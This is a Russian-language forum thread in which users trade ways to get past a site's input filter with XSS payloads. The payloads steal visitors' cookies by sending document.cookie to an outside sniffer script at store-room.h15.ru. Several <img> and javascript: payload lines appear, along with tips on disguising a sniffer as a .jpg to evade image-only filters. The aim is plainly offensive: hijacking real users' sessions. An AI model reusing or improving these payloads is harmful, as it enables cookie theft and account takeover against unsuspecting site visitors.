Подскажите как обойти следующую фильтрацию: До фильтрации: <img src='http://store-room.h15.ru/sniff/sniff.php?'+document.cookie></img> или <img src='http://store-room.h15.ru/sniff/sniff.php?'+document.cookie></img> После фильтрации: <img src=/'http://store-room.h15.ru/sniff/sniff.php?/'+document.cookie></img> Как бы это обойти?
мдя.... имхо тебе этот код ничего не даст. Надо чтобы текст интерпритировался браузером как ЯваКод. А тут просто адрес. И на снифф тебе придет ИП, реферер, а вместо кук document.cookie
Мдя....эт точно! Сниффер возвращает браузеру прозрачный GIF-файл размером 1x1 px. Это позволяет вызывать сниффер как непосредственно по ссылке в теге <a>, так и в качестве src тега <img>. Сам сниффер имеет расширение .jpg, что позволяет использовать его в обход фильтров, пропускающих только адреса картинок. А у тебя что?? расширения php. Так не получется или я что то не так понял...щас не могу думать голова забита (
Попробуй Code: <img src=javascript:aa=new Image();aa.src="http://store-room.h15.ru/sniff/sniff.php?"+document.cookie;>
Короче теперь такая трабла, вроде обошел фильтрацию вот этим: <img src=javascript:aa=new Image();aa.src="http://store-room.h15.ru/sniff/sniff.php?"+document.cookie;> но он не хочет выполняться =( куки не приходят =(. Также пробовал с античатовским снифером ни хрена!
